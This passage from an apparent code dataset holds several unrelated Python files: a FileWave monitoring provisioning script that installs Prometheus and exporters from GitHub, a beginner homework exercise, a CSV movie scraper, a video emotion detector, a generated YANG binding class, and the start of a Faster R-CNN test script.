/usr/local/filewave/fwxserver/DB/pg_data/postgresql.conf\"\n ]\n\n return run_root_commands(cmds)\n\ndef provision_prometheus_binary():\n cmds = [\n \"wget https://github.com/prometheus/prometheus/releases/download/v2.19.2/prometheus-2.19.2.linux-amd64.tar.gz\",\n \"tar xzf prometheus-2.19.2.linux-amd64.tar.gz\",\n \"mkdir -p /usr/local/etc/filewave/prometheus\",\n \"mkdir -p /usr/local/etc/filewave/prometheus/conf.d/rules\",\n \"mkdir -p /usr/local/etc/filewave/prometheus/conf.d/alerts\",\n \"mkdir -p /usr/local/filewave/prometheus/\",\n \"mv prometheus-2.19.2.linux-amd64/prometheus /usr/local/sbin/\",\n \"mv prometheus-2.19.2.linux-amd64/promtool /usr/local/sbin/\",\n \"mv prometheus-2.19.2.linux-amd64/tsdb /usr/local/sbin/\",\n \"mv prometheus-2.19.2.linux-amd64/console_libraries /usr/local/filewave/prometheus/\",\n \"mv prometheus-2.19.2.linux-amd64/consoles /usr/local/filewave/prometheus/\",\n \"mkdir -p /usr/local/etc/filewave/prometheus/conf.d/jobs/http\",\n \"chown -R root:root /usr/local/filewave/prometheus/\",\n \"rm -rf prometheus-2.19.2.linux-amd64\"\n ]\n\n run_root_commands(cmds)\n\n prom_file = \"prometheus.yml\"\n data = pkg_resources.resource_string(\"monitor.config\", prom_file).decode('utf-8')\n provisioning_file = os.path.join(\"/usr/local/etc/filewave/prometheus\", prom_file)\n with open(provisioning_file, 'w') as f:\n f.write(data)\n shutil.chown(provisioning_file, user=\"root\", group=\"root\")\n shutil.chown(\"/usr/local/filewave/prometheus\", user=\"root\", group=\"root\")\n\ndef provision_apache_mod_status():\n '''\n #LoadModule status_module modules/mod_status.so\n\n # Uncomment following lines to enable mod status = and connect to https://localhost:20443/server-status?refresh=5 to see server status \n # Used by the prometheus apache_exporter. Works only on localhost (intentional to reduce security exposure). \n <IfModule status_module> \n <Location /server-status> \n SetHandler server-status \n Order Deny,Allow \n Deny from all \n Allow from 127.0.0.1 ::1 \n </Location> \n ExtendedStatus On \n </IfModule> \n '''\n cmds = [\n \"sed -i 's/#LoadModule status_module modules\\/mod_status\\.so/LoadModule status_module modules\\/mod_status\\.so/g' /usr/local/filewave/apache/conf/httpd.conf\"\n ]\n\n run_root_commands(cmds)\n\ndef provision_mtail_binary():\n logger.info(\"downloading mtail...\")\n\n # mtail binary: 15th Jul 2020\n # https://github.com/google/mtail/releases/download/v3.0.0-rc36/mtail_v3.0.0-rc36_linux_amd64\n cmds = [\n \"mkdir -p /usr/local/etc/filewave/mtail/progs\",\n \"chown -R root:root /usr/local/etc/filewave/mtail\",\n \"wget https://github.com/google/mtail/releases/download/v3.0.0-rc36/mtail_v3.0.0-rc36_linux_amd64\",\n \"cp mtail_v3.0.0-rc36_linux_amd64 /usr/local/sbin/mtail\",\n \"chmod +x /usr/local/sbin/mtail\",\n \"firewall-cmd --zone=public --add-port=21090/tcp --permanent\",\n \"firewall-cmd --reload\"\n ]\n\n run_root_commands(cmds)\n\n # write .mtail programs into /usr/local/etc/filewave/mtail/progs\n for mtail_file in pkg_resources.resource_listdir(\"monitor\", \"config\"):\n if mtail_file.endswith(\".mtail\"):\n logger.info(f\"writing with: {mtail_file}\")\n data = pkg_resources.resource_string(\"monitor.config\", mtail_file).decode('utf-8')\n provisioning_file = os.path.join(\"/usr/local/etc/filewave/mtail/progs\", mtail_file)\n with open(provisioning_file, 'w') as f:\n f.write(data)\n shutil.chown(provisioning_file, user=\"root\", group=\"root\")\n\ndef provision_exporters():\n logger.info(\"downloading postgres exporter...\")\n # from https://github.com/wrouesnel/postgres_exporter/releases/download/v0.8.0/postgres_exporter_v0.8.0_linux-amd64.tar.gz\n cmds = [\n \"wget https://github.com/wrouesnel/postgres_exporter/releases/download/v0.8.0/postgres_exporter_v0.8.0_linux-amd64.tar.gz\",\n \"tar xzf postgres_exporter_v0.8.0_linux-amd64.tar.gz\",\n \"mv -f postgres_exporter_v0.8.0_linux-amd64/postgres_exporter /usr/local/sbin/ && rm -rf postgres_exporter_v0.8.0_linux-amd64\"\n ]\n\n run_root_commands(cmds)\n\n logger.info(\"downloading apache exporter...\")\n cmds = [\n \"wget https://github.com/Lusitaniae/apache_exporter/releases/download/v0.8.0/apache_exporter-0.8.0.linux-amd64.tar.gz\",\n \"tar xzf apache_exporter-0.8.0.linux-amd64.tar.gz\",\n \"mv -f apache_exporter-0.8.0.linux-amd64/apache_exporter /usr/local/sbin/ && rm -rf apache_exporter-0.8.0.linux-amd64\"\n ]\n\n run_root_commands(cmds)\n\n logger.info(\"downloading node_exporter\")\n cmds = [\n \"wget https://github.com/prometheus/node_exporter/releases/download/v1.0.1/node_exporter-1.0.1.linux-amd64.tar.gz\",\n \"tar xzf node_exporter-1.0.1.linux-amd64.tar.gz\",\n \"mv -f node_exporter-1.0.1.linux-amd64/node_exporter /usr/local/sbin/ && rm -rf node_exporter-1.0.1.linux-amd64\"\n ]\n\n run_root_commands(cmds)\n\ndef provision_supervisord_conf():\n cmds = [\n \"sed -i 's/\\; port\\=\\*\\:9001/port=127\\.0\\.0\\.1\\:9001/g' /usr/local/etc/filewave/supervisor/supervisord-server.conf\",\n \"sed -i 's/\\; \\[inet_http_server\\]/\\[inet_http_server\\]/g' /usr/local/etc/filewave/supervisor/supervisord-server.conf\",\n \"sed -i 's/\\;\\[include\\]/\\[include\\]/g' /usr/local/etc/filewave/supervisor/supervisord-server.conf\",\n \"sed -i 's/\\;files = relative\\/directory\\/\\*\\.ini/files=extras\\/\\*\\.conf/g' /usr/local/etc/filewave/supervisor/supervisord-server.conf\",\n ]\n\n supervisord_dir = os.path.join(\"/usr/local/etc/filewave/supervisor/\", \"extras\")\n if not os.path.exists(supervisord_dir):\n os.makedirs(supervisord_dir)\n\n data = pkg_resources.resource_string(\"monitor.config\", \"monitor-v13.conf\").decode('utf-8')\n provisioning_file = os.path.join(supervisord_dir, \"monitor-v13.conf\")\n with open(provisioning_file, \"w\") as f:\n f.write(data)\n\n run_root_commands(cmds)\n\ndef validate_provisioning():\n binaries = [ \"node_exporter\", \"apache_exporter\", \"mtail\", \"postgres_exporter\", \"prometheus\", \"promtool\", \"tsdb\" ]\n for b in binaries:\n f = os.path.join(\"/usr/local/sbin\", b)\n if not os.path.exists(f):\n raise ValidationExceptionBinaryNotFound(f\"failed to find required binary: {f}\")\n else:\n logger.info(f\"OK: {f}\")\n shutil.chown(f, user=\"root\", group=\"root\")\n"} {"ext": "py", "sha": "1a3142240fb52c5c55bc9219738b50d1d08e6c6d", "content": "#Rebecca Schuetz\n#May 25, 2016\n#Homework 2\n\n#1) Make a list of the following numbers: 22, 90, 0, -10, 3, 22, and 48\nnumbers = [22, 90, 0, -10, 3, 22, 48]\n#1) Display the number of elements in the list\nprint(len(numbers))\n#2) Display the 4th element of this list.\nprint(numbers[3])\n#3) Display the sum of the 2nd and 4th element of the list.\nprint(numbers[1] + numbers[3])\n#4) Display the 2nd-largest value in the list.\nprint(sorted(numbers)[-2])\n#5) Display the last element of the original unsorted list\nprint(list(numbers)[-1])\n#6) For each number, display a number: if your original number is less than 10,\n#multiply it by thirty. If it's also even, add six.\n#If it's greater than 50 subtract ten.\n#If it's not negative ten, subtract one.\n#(For example: 2 is less than 10, so 2 * 30 = 60, 2 is also even,\n#so 60 + 6 = 66, 2 is not negative ten, so 66 - 1 = 65.)\n#print('The answers I know are right')\n#for number in numbers:\n# if number < 10:\n# number_less_than_10 = number * 30\n# if number % 2 == 0:\n# if number == -10:\n# print(number_less_than_10 + 6)\n# else:\n# print(number_less_than_10 + 5)\n# else:\n# print(number_less_than_10 - 1)\n# elif number > 50:\n# print(number - 11)\n# else:\n# print(number - 1)\n\n#print('A way of doing it without the awkward minus ones')\nfor number in numbers:\n newnumber = number\n if number < 10:\n newnumber = number * 30\n if number % 2 == 0:\n newnumber = newnumber + 6\n elif number > 50:\n newnumber = number - 10\n if number == -10:\n print(newnumber)\n else:\n print(newnumber - 1)\n#7) Sum the result of each of the numbers divided by two.\nprint(sum(numbers) / 2)\n#DICTIONARIES\n\n#8) Sometimes dictionaries are used to describe multiple aspects of a single object.\n#Like, say, a movie. Define a dictionary called movie that works with the following code.\nmovie = {'title': 'The Life Aquatic', 'year': 2004, 'director': 'Wes Anderson',\n'budget': 50000000, 'revenue': 34806726}\n\nprint(\"My favorite movie is\", movie['title'], \"which was released in\", movie['year'],\n\"and was directed by\", movie['director'])\n\n#9) Add entries to the movie dictionary for budget and revenue\n#(you'll use code like movie['budget'] = 1000), and print out the difference between the two.\n\n#10) If the movie cost more to make than it made in theaters, print \"It was a flop\".\n#If the film's revenue was more than five times the amount it cost to make, print \"That was a good investment.\"\nif movie['revenue'] < movie['budget']:\n print(\"It was a flop.\")\nif movie['revenue'] > (movie['budget'] * 5):\n print(\"That was a good investment.\")\n#11) Sometimes dictionaries are used to describe the same aspects of many different objects.\n#Make ONE dictionary that describes the population of the boroughs of NYC.\n#Manhattan has 1.6 million residents,\n#Brooklyn has 2.6m,\n#Bronx has 1.4m,\n#Queens has 2.3m and\n#Staten Island has 470,000.\n#(Tip: keeping it all in either millions or thousands is a good idea)\npopulation = {'Manhattan': 1.6, 'Brooklyn': 2.6, 'Bronx': 1.4, 'Queens': 2.3,\n'Staten Island': .47 }\n\n#12) Display the population of Brooklyn.\nprint(\"Brooklyn has\", population['Brooklyn'], 'million people.')\n#13) Display the combined population of all five boroughs.\nprint(\"All five buroughs have\", round(sum(population.values()),2), 'million people.')\n#14) Display what percent of NYC's population lives in Manhattan.\nprint(round(population['Manhattan'] / sum(population.values()) * 100,2), \"percent of NYC's population lives in Manhattan.\")\n"} {"ext": "py", "sha": "1a3142cff2943e228f408b8354cbe67d1b3270ed", "content": "import sys\nimport csv\nimport get_info\n\ndef main(argv):\n skip = int(argv[1])\n with open('final_movie_upload_data.csv', mode='r') as csv_file:\n csv_reader = csv.DictReader(csv_file)\n for i in range(0, skip):\n next(csv_reader)\n count = 0\n new_data = []\n for row in csv_reader:\n idx = row[\"idx\"]\n title = row[\"title\"]\n #if line_count == 0:\n # print(f'Column names are {\", \".join(row)}')\n # line_count += 1\n # continue\n print(f'\\t{idx} {title}')\n data = get_info.search(title)\n if \"title\" in data and \"description\" in data:\n data[\"idx\"] = idx\n data[\"title\"] = f\"{data['title']}({title})\"\n new_data.append(data)\n count += 1\n if count == 3 :\n break;\n print(f'Processed {count} lines.')\n append(new_data)\n\ndef append(data):\n field_names = ['idx','title','description']\n with open('movie_info.csv', 'a+', newline='') as write_obj:\n dict_writer = csv.DictWriter(write_obj, fieldnames=field_names)\n for row in data:\n dict_writer.writerow(row)\n\n\nif __name__ == \"__main__\":\n main(sys.argv)\n"} {"ext": "py", "sha": "1a31442230ddacbd68261d47f35e92cb2940da0f", "content": "\nfrom tensorflow.keras.models import model_from_json\nimport numpy as np\nimport cv2\nimport math\nimport tensorflow as tf\nfrom tensorflow.keras.preprocessing import image\nfacec = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\nfrom matplotlib import pyplot as plt\nimport os\nimport shutil\nfrom skimage.measure import compare_ssim\n\nwith open(\"model.json\", \"r\") as json_file: #Loading the saved model\n loaded_model_json = json_file.read()\n loaded_model = model_from_json(loaded_model_json)\n\nloaded_model.load_weights(\"model_weights.h5\")\nloaded_model._make_predict_function()\nlabel_to_text = {0:'angry', 1:'disgust', 2:'fear', 3:'happy', 4: 'sad'}\n\ndef pred(img_path): \n label_to_text = {0:'angry', 1:'disgust', 2:'fear', 3:'happy', 4: 'sad'} \n img=cv2.imread(img_path)\t\t\t\t\t\t\t\t\t#read Image\n gray_fr = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\t\t\t\t#covert image to grayscale\n faces_rects = facec.detectMultiScale(gray_fr, scaleFactor = 1.2, minNeighbors = 5) #opencv's cascade classifier will be used for detecting the face\n if len(faces_rects)!=0:\n for (x, y, w, h) in faces_rects:\n fc = gray_fr[y:y+h, x:x+w] #extracting only the face part\n roi = cv2.resize(fc, (48, 48))\t#resizing it according to the image that are acceptable by our model\n img = image.img_to_array(roi)\n img = img/255\n img = np.expand_dims(img, axis=0)\n return label_to_text[np.argmax(loaded_model.predict(img))],img #model.predict is used for predicting the emotion\n else:\n return 0,0 #return 0 if the face is not found\n\ndef removeout():\n shutil.rmtree('output/') #remove output folder\n\ndef vidframe(vidname):\n\tif vidname==0:\n\t\tcap = cv2.VideoCapture(0)\n\t\t# Define the codec and create VideoWriter object\n\t\tfourcc = cv2.VideoWriter_fourcc(*'XVID')\n\t\tout = cv2.VideoWriter('output.mp4',fourcc, 20.0, (640,480))\n\n\t\twhile(cap.isOpened()):\n\t\t ret, frame = cap.read()\n\t\t if ret==True:\n\t\t out.write(frame)\n\t\t cv2.imshow('frame',frame)\n\t\t if cv2.waitKey(1) & 0xFF == ord('q'):\n\t\t break\n\t\t else:\n\t\t break\n\n\t\t# Release everything if job is finished\n\t\tcap.release()\n\t\tout.release()\n\t\tcv2.destroyAllWindows()\n\t\tvidname=\"output.mp4\"\n\n\tif os.path.exists('output'): #if output folder is present then delete it\n\t\tremoveout()\t\t\t\t\t\t#create Output folder for storing frame\n\tos.mkdir('output')\n\tcap = cv2.VideoCapture(vidname)\t\t\t#capture video\n\tframeRate=cap.get(5)\t\t\t\t\t\n\tcount = 0\n\twhile(cap.isOpened()):\t\t\t\t\t#store the frames in output folder\n\t\tframeId = cap.get(1)\n\t\tret, frame = cap.read()\n\t\tif (ret != True):\n\t\t\tbreak\n\t\tif (frameId % math.floor(frameRate) == 0):\n\t\t\tfilename =\"output/frame%d.jpg\" % count;count+=1\n\t\t\tcv2.imwrite(filename, frame)\n\tcap.release()\n\tresult=[]\t\t\t\t\t\t\t# used for storing emotion\n\tface=[]\t\t\t\t\t\t\t\t#used for storing face images\n\tfor filename in os.listdir(\"output\"): #loop through each frame\n\t\ta,b = pred(\"output/\"+filename) #run pred function to get emotion and face images\n\t\tresult.append(a)\n\t\tface.append(b)\n\tremoveout()\n\tresult=[x for x in result if x!=0] #removing null prediction\n\tface=[x for x in face if len(str(x))>1]\n\treturn result, face\n\ndef ssimscore1(im1,im2):\n im1=im1.reshape(48, 48, 1).astype('float32') #reshaping the flattened image array\n im2=im2.reshape(48, 48, 1).astype('float32')\n (score, diff) = compare_ssim(im1, im2, full=True,multichannel=True) #comparing the image for finding difference using compare_ssim function \n return score\n \n\n\n\n\n\n"} {"ext": "py", "sha": "1a31448f1f90b075db6dd6164c277187bb7926fc", "content": "\nfrom operator import attrgetter\nimport pyangbind.lib.xpathhelper as xpathhelper\nfrom pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType\nfrom pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType\nfrom pyangbind.lib.base import PybindBase\nfrom decimal import Decimal\nfrom bitarray import bitarray\nimport __builtin__\nclass cpu_info_state(PybindBase):\n \"\"\"\n This class was auto-generated by the PythonClass plugin for PYANG\n from YANG module brocade-qos-operational - based on the path /cpu-info-state. Each member element of\n the container is represented as a class variable - with a specific\n YANG type.\n\n YANG Description: CPU EGID and Group ID mapping\n \"\"\"\n __slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__name','__egid','__group_id','__description',)\n\n _yang_name = 'cpu-info-state'\n _rest_name = 'cpu-info-state'\n\n _pybind_generated_by = 'container'\n\n def __init__(self, *args, **kwargs):\n\n path_helper_ = kwargs.pop(\"path_helper\", None)\n if path_helper_ is False:\n self._path_helper = False\n elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):\n self._path_helper = path_helper_\n elif hasattr(self, \"_parent\"):\n path_helper_ = getattr(self._parent, \"_path_helper\", False)\n self._path_helper = path_helper_\n else:\n self._path_helper = False\n\n extmethods = kwargs.pop(\"extmethods\", None)\n if extmethods is False:\n self._extmethods = False\n elif extmethods is not None and isinstance(extmethods, dict):\n self._extmethods = extmethods\n elif hasattr(self, \"_parent\"):\n extmethods = getattr(self._parent, \"_extmethods\", None)\n self._extmethods = extmethods\n else:\n self._extmethods = False\n self.__group_id = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['-128..127']}, int_size=8), is_leaf=True, yang_name=\"group-id\", rest_name=\"group-id\", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-qos-operational', defining_module='brocade-qos-operational', yang_type='int8', is_config=False)\n self.__egid = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name=\"egid\", rest_name=\"egid\", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-qos-operational', defining_module='brocade-qos-operational', yang_type='uint32', is_config=False)\n self.__name = YANGDynClass(base=unicode, is_leaf=True, yang_name=\"name\", rest_name=\"name\", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-qos-operational', defining_module='brocade-qos-operational', yang_type='string', is_config=False)\n self.__description = YANGDynClass(base=unicode, is_leaf=True, yang_name=\"description\", rest_name=\"description\", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-qos-operational', defining_module='brocade-qos-operational', yang_type='string', is_config=False)\n\n load = kwargs.pop(\"load\", None)\n if args:\n if len(args) > 1:\n raise TypeError(\"cannot create a YANG container with >1 argument\")\n all_attr = True\n for e in self._pyangbind_elements:\n if not hasattr(args[0], e):\n all_attr = False\n break\n if not all_attr:\n raise ValueError(\"Supplied object did not have the correct attributes\")\n for e in self._pyangbind_elements:\n nobj = getattr(args[0], e)\n if nobj._changed() is False:\n continue\n setmethod = getattr(self, \"_set_%s\" % e)\n if load is None:\n setmethod(getattr(args[0], e))\n else:\n setmethod(getattr(args[0], e), load=load)\n\n def _path(self):\n if hasattr(self, \"_parent\"):\n return self._parent._path()+[self._yang_name]\n else:\n return [u'cpu-info-state']\n\n def _rest_path(self):\n if hasattr(self, \"_parent\"):\n if self._rest_name:\n return self._parent._rest_path()+[self._rest_name]\n else:\n return self._parent._rest_path()\n else:\n return [u'cpu-info-state']\n\n def _get_name(self):\n \"\"\"\n Getter method for name, mapped from YANG variable /cpu_info_state/name (string)\n\n YANG Description: CPU EGID name\n \"\"\"\n return self.__name\n \n def _set_name(self, v, load=False):\n \"\"\"\n Setter method for name, mapped from YANG variable /cpu_info_state/name (string)\n If this variable is read-only (config: false) in the\n source YANG file, then _set_name is considered as a private\n method. Backends looking to populate this variable should\n do so via calling thisObj._set_name() directly.\n\n YANG Description: CPU EGID name\n \"\"\"\n if hasattr(v, \"_utype\"):\n v = v._utype(v)\n try:\n t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name=\"name\", rest_name=\"name\", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-qos-operational', defining_module='brocade-qos-operational', yang_type='string', is_config=False)\n except (TypeError, ValueError):\n raise ValueError({\n 'error-string': \"\"\"name must be of a type compatible with string\"\"\",\n 'defined-type': \"string\",\n 'generated-type': \"\"\"YANGDynClass(base=unicode, is_leaf=True, yang_name=\"name\", rest_name=\"name\", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-qos-operational', defining_module='brocade-qos-operational', yang_type='string', is_config=False)\"\"\",\n })\n\n self.__name = t\n if hasattr(self, '_set'):\n self._set()\n\n def _unset_name(self):\n self.__name = YANGDynClass(base=unicode, is_leaf=True, yang_name=\"name\", rest_name=\"name\", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-qos-operational', defining_module='brocade-qos-operational', yang_type='string', is_config=False)\n\n\n def _get_egid(self):\n \"\"\"\n Getter method for egid, mapped from YANG variable /cpu_info_state/egid (uint32)\n\n YANG Description: CPU EGID value\n \"\"\"\n return self.__egid\n \n def _set_egid(self, v, load=False):\n \"\"\"\n Setter method for egid, mapped from YANG variable /cpu_info_state/egid (uint32)\n If this variable is read-only (config: false) in the\n source YANG file, then _set_egid is considered as a private\n method. Backends looking to populate this variable should\n do so via calling thisObj._set_egid() directly.\n\n YANG Description: CPU EGID value\n \"\"\"\n if hasattr(v, \"_utype\"):\n v = v._utype(v)\n try:\n t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name=\"egid\", rest_name=\"egid\", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-qos-operational', defining_module='brocade-qos-operational', yang_type='uint32', is_config=False)\n except (TypeError, ValueError):\n raise ValueError({\n 'error-string': \"\"\"egid must be of a type compatible with uint32\"\"\",\n 'defined-type': \"uint32\",\n 'generated-type': \"\"\"YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name=\"egid\", rest_name=\"egid\", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-qos-operational', defining_module='brocade-qos-operational', yang_type='uint32', is_config=False)\"\"\",\n })\n\n self.__egid = t\n if hasattr(self, '_set'):\n self._set()\n\n def _unset_egid(self):\n self.__egid = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name=\"egid\", rest_name=\"egid\", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-qos-operational', defining_module='brocade-qos-operational', yang_type='uint32', is_config=False)\n\n\n def _get_group_id(self):\n \"\"\"\n Getter method for group_id, mapped from YANG variable /cpu_info_state/group_id (int8)\n\n YANG Description: CPU Group ID\n \"\"\"\n return self.__group_id\n \n def _set_group_id(self, v, load=False):\n \"\"\"\n Setter method for group_id, mapped from YANG variable /cpu_info_state/group_id (int8)\n If this variable is read-only (config: false) in the\n source YANG file, then _set_group_id is considered as a private\n method. Backends looking to populate this variable should\n do so via calling thisObj._set_group_id() directly.\n\n YANG Description: CPU Group ID\n \"\"\"\n parent = getattr(self, \"_parent\", None)\n if parent is not None and load is False:\n raise AttributeError(\"Cannot set keys directly when\" +\n \" within an instantiated list\")\n\n if hasattr(v, \"_utype\"):\n v = v._utype(v)\n try:\n t = YANGDynClass(v,base=RestrictedClassType(base_type=int, restriction_dict={'range': ['-128..127']}, int_size=8), is_leaf=True, yang_name=\"group-id\", rest_name=\"group-id\", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-qos-operational', defining_module='brocade-qos-operational', yang_type='int8', is_config=False)\n except (TypeError, ValueError):\n raise ValueError({\n 'error-string': \"\"\"group_id must be of a type compatible with int8\"\"\",\n 'defined-type': \"int8\",\n 'generated-type': \"\"\"YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['-128..127']}, int_size=8), is_leaf=True, yang_name=\"group-id\", rest_name=\"group-id\", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-qos-operational', defining_module='brocade-qos-operational', yang_type='int8', is_config=False)\"\"\",\n })\n\n self.__group_id = t\n if hasattr(self, '_set'):\n self._set()\n\n def _unset_group_id(self):\n self.__group_id = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['-128..127']}, int_size=8), is_leaf=True, yang_name=\"group-id\", rest_name=\"group-id\", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-qos-operational', defining_module='brocade-qos-operational', yang_type='int8', is_config=False)\n\n\n def _get_description(self):\n \"\"\"\n Getter method for description, mapped from YANG variable /cpu_info_state/description (string)\n\n YANG Description: Description of CPU EGID\n \"\"\"\n return self.__description\n \n def _set_description(self, v, load=False):\n \"\"\"\n Setter method for description, mapped from YANG variable /cpu_info_state/description (string)\n If this variable is read-only (config: false) in the\n source YANG file, then _set_description is considered as a private\n method. Backends looking to populate this variable should\n do so via calling thisObj._set_description() directly.\n\n YANG Description: Description of CPU EGID\n \"\"\"\n if hasattr(v, \"_utype\"):\n v = v._utype(v)\n try:\n t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name=\"description\", rest_name=\"description\", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-qos-operational', defining_module='brocade-qos-operational', yang_type='string', is_config=False)\n except (TypeError, ValueError):\n raise ValueError({\n 'error-string': \"\"\"description must be of a type compatible with string\"\"\",\n 'defined-type': \"string\",\n 'generated-type': \"\"\"YANGDynClass(base=unicode, is_leaf=True, yang_name=\"description\", rest_name=\"description\", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-qos-operational', defining_module='brocade-qos-operational', yang_type='string', is_config=False)\"\"\",\n })\n\n self.__description = t\n if hasattr(self, '_set'):\n self._set()\n\n def _unset_description(self):\n self.__description = YANGDynClass(base=unicode, is_leaf=True, yang_name=\"description\", rest_name=\"description\", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-qos-operational', defining_module='brocade-qos-operational', yang_type='string', is_config=False)\n\n name = __builtin__.property(_get_name)\n egid = __builtin__.property(_get_egid)\n group_id = __builtin__.property(_get_group_id)\n description = __builtin__.property(_get_description)\n\n\n _pyangbind_elements = {'name': name, 'egid': egid, 'group_id': group_id, 'description': description, }\n\n\n"} {"ext": "py", "sha": "1a3147e48ad4eeca45f01c46703c327d79896717", "content": "# --------------------------------------------------------\n# Tensorflow Faster R-CNN\n# Licensed under The MIT License [see LICENSE for details]\n# Written by Jiasen Lu, Jianwei Yang, based on code from Ross Girshick\n# --------------------------------------------------------\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport _init_paths\nimport os\nimport sys\nimport numpy as np\nimport argparse\nimport pprint\nimport pdb\nimport time\nimport cv2\nimport torch\nfrom torch.autograd import Variable\nimport torch.nn as nn\nimport torch.optim as optim\n\nimport xml.etree.ElementTree as ET\nimport torchvision.transforms as transforms\nimport torchvision.datasets as dset\nfrom scipy.misc import imread\nfrom roi_data_layer.roidb import combined_roidb\nfrom roi_data_layer.roibatchLoader import roibatchLoader\nfrom model.utils.config import cfg, cfg_from_file, cfg_from_list, get_output_dir\nfrom model.rpn.bbox_transform import clip_boxes\nfrom model.nms.nms_wrapper import nms\nfrom model.rpn.bbox_transform import bbox_transform_inv\nfrom model.utils.net_utils import save_net, load_net, vis_detections\nfrom model.utils.blob import im_list_to_blob\nfrom model.faster_rcnn.vgg16 import vgg16\nfrom model.faster_rcnn.resnet import resnet\nfrom model.faster_rcnn.prefood_res50 import PreResNet50\nfrom datasets.food_category import get_categories\nfrom datasets.id2name import id2eng, id2chn\n\ntry:\n xrange # Python 2\nexcept NameError:\n xrange = range # Python 3\n\nbeehoonid2name = {'1': 'bee hoon', '2': 'fried noodles', '3': 'kway teow', '4': 'kway teow, yellow noodles mix', '5': 'rice', '51': 'fried rice', '7': 'hokkien mee', '8': 'maggie noodle', '9': 'Glutinous rice', '10': 'beehoon and noodle mix', '110': 'stir fry mee tai mak', '11': 'fried egg', '12': 'scrambled egg', '13': 'cabbage', '131': 'hairy gourd with egg', '14': 'french bean/long bean', '141': 'broccoli', '142': 'celery', '143': 'beansprout', '15': 'deep fried beancurd skin', '16':\n 'fried beancurd/taukwa', '17': 'taupok', '171': 'braised taupok', '18': 'Acar', '181': 'Stir fried eggplant', '19': 'cucumber', '21': 'luncheon meat', '22': 'hashbrown', '23': 'ngoh hiang', '24': 'begedil', '25': 'spring roll', '31': 'otah', '32': 'fish ball/sotong ball', '33': 'white, yellow fish fillet', '331': 'orange, red fish fillet', '34': 'fish cake', '341': 'ngoh hiang fish cake', '35': 'kuning fish (fried small fish)', '351': 'fried fish steak', '36': 'siew mai',\n '41': 'hotdog/taiwan sausage', '42': 'seaweed chicken', '43': 'chicken nugget', '44': 'fried chicken / chicken wings', '441': 'fried chicken chopped up', '45': 'fried chicken cutlet (not ground meat)', '55': 'curry mixed veg', '551': 'curry chicken and potato', '61': 'ikan bilis', '62': 'chilli paste', '63': 'green chilli', '64': 'peanut', '65': 'Sweet Sauce', '66': 'red chilli chopped', '71': 'deep fried fish', '91': 'Butter cereal chicken', '92': 'fried wanton/ dumpling', '93':\n 'Vegetarian meat', '94': 'Fried onions', '95': 'Crabstick'}\n\n#id2chn = beehoonid2name\n\ndef parse_rec(filename):\n \"\"\" Parse a PASCAL VOC xml file \"\"\"\n tree = ET.parse(filename)\n objects = []\n for obj in tree.findall('object'):\n obj_struct = {}\n obj_struct['name'] = obj.find('name').text\n obj_struct['pose'] = obj.find('pose').text\n obj_struct['truncated'] = int(obj.find('truncated').text)\n obj_struct['difficult'] = int(obj.find('difficult').text)\n bbox = obj.find('bndbox')\n obj_struct['bbox'] = [int(bbox.find('xmin').text),\n int(bbox.find('ymin').text),\n int(bbox.find('xmax').text),\n int(bbox.find('ymax').text)]\n objects.append(obj_struct)\n\n return objects\n\ndef parse_args():\n \"\"\"\n Parse input arguments\n \"\"\"\n parser = argparse.ArgumentParser(description='Train a Fast R-CNN network')\n parser.add_argument('--dataset', dest='dataset',\n help='training dataset',\n default='pascal_voc', type=str)\n parser.add_argument('--cfg', 